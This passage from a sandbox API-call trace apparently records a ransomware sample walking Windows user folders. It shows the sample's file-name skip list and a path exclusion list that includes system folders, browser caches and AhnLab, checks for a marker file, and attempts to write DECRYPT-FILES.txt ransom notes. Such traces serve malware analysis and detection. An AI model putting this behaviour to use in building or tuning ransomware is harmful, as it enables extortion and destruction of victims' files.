dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.666] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.666] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.666] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.666] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.666] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e91d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.666] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.666] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.666] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.666] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.666] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.667] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.667] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="autorun.inf") returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="boot.ini") returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="desktop.ini") returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat") returned -1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="iconcache.db") returned -1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="bootsect.bak") returned 1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat.log") returned -1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="thumbs.db") returned -1 [0186.667] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0186.667] lstrlenW (lpString="Desktop.lnk") returned 11 [0186.667] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.667] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="autorun.inf") returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="boot.ini") returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="desktop.ini") returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat") returned -1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="iconcache.db") returned -1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="bootsect.bak") returned 1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat.log") returned -1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="thumbs.db") returned -1 [0186.667] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Bootfont.bin") returned 1 [0186.667] lstrlenW (lpString="Downloads.lnk") returned 13 [0186.667] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.667] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="autorun.inf") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="boot.ini") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="desktop.ini") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="iconcache.db") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="bootsect.bak") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat.log") returned 1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="thumbs.db") returned -1 [0186.667] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Bootfont.bin") returned 1 [0186.667] lstrlenW (lpString="RecentPlaces.lnk") returned 16 [0186.668] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.668] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0186.668] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.668] CloseHandle (hObject=0xffffffff) returned 0 [0186.668] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0186.668] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0186.668] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0186.668] lstrcatW (in: lpString1="Local Settings", lpString2="\\" | out: lpString1="Local Settings\\") returned="Local Settings\\" [0186.668] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0186.668] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\Program Files") returned 0x0 [0186.668] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch=":\\Windows") returned 0x0 [0186.668] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\Games\\") returned 0x0 [0186.668] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\All Users") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="\\Local Settings\\") returned="\\Local Settings\\" [0186.669] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0186.669] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0186.669] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0186.669] lstrcatW (in: lpString1="Music", lpString2="\\" | out: lpString1="Music\\") returned="Music\\" [0186.669] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\Program Files") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch=":\\Windows") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\Games\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\All Users") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="AhnLab") returned 0x0 [0186.669] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.669] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0186.669] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.669] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Music\\\\0a16c9.tmp") returned 34 [0186.669] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.669] GetLastError () returned 0x5 [0186.669] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0186.670] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.670] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Music\\\\DECRYPT-FILES.txt") returned 41 [0186.670] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.670] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0186.670] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0186.670] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.671] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.671] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.671] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.671] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.671] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.671] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.671] CloseHandle (hObject=0xffffffff) returned 0 [0186.671] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0186.671] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0186.671] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0186.671] lstrcatW (in: lpString1="My Documents", lpString2="\\" | out: lpString1="My Documents\\") returned="My Documents\\" [0186.671] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\Program Files") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch=":\\Windows") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\Games\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\All Users") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.671] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.672] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.672] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="AhnLab") returned 0x0 [0186.672] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.672] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0186.672] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.672] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\My Documents\\\\0a16c9.tmp") returned 41 [0186.672] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\my documents\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.677] GetLastError () returned 0x5 [0186.677] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0186.677] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.677] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\My Documents\\\\DECRYPT-FILES.txt") returned 48 [0186.677] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\my documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.679] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0186.679] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\My Documents\\*") returned="C:\\Users\\Default\\My Documents\\*" [0186.679] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.679] CloseHandle (hObject=0xffffffff) returned 0 [0186.679] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0186.679] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0186.679] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0186.679] lstrcatW (in: lpString1="NetHood", lpString2="\\" | out: lpString1="NetHood\\") returned="NetHood\\" [0186.679] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0186.679] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\Program Files") returned 0x0 [0186.679] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch=":\\Windows") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\Games\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\All Users") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="AhnLab") returned 0x0 [0186.680] StrStrW (lpFirst="C:\\Users\\Default\\NetHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.680] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0186.680] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.680] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\NetHood\\\\0a16c9.tmp") returned 36 [0186.680] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\nethood\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.680] GetLastError () returned 0x5 [0186.680] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0186.680] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.680] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\NetHood\\\\DECRYPT-FILES.txt") returned 43 [0186.680] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\nethood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.680] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0186.680] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\NetHood\\*") returned="C:\\Users\\Default\\NetHood\\*" [0186.680] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.680] CloseHandle (hObject=0xffffffff) returned 0 [0186.681] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: 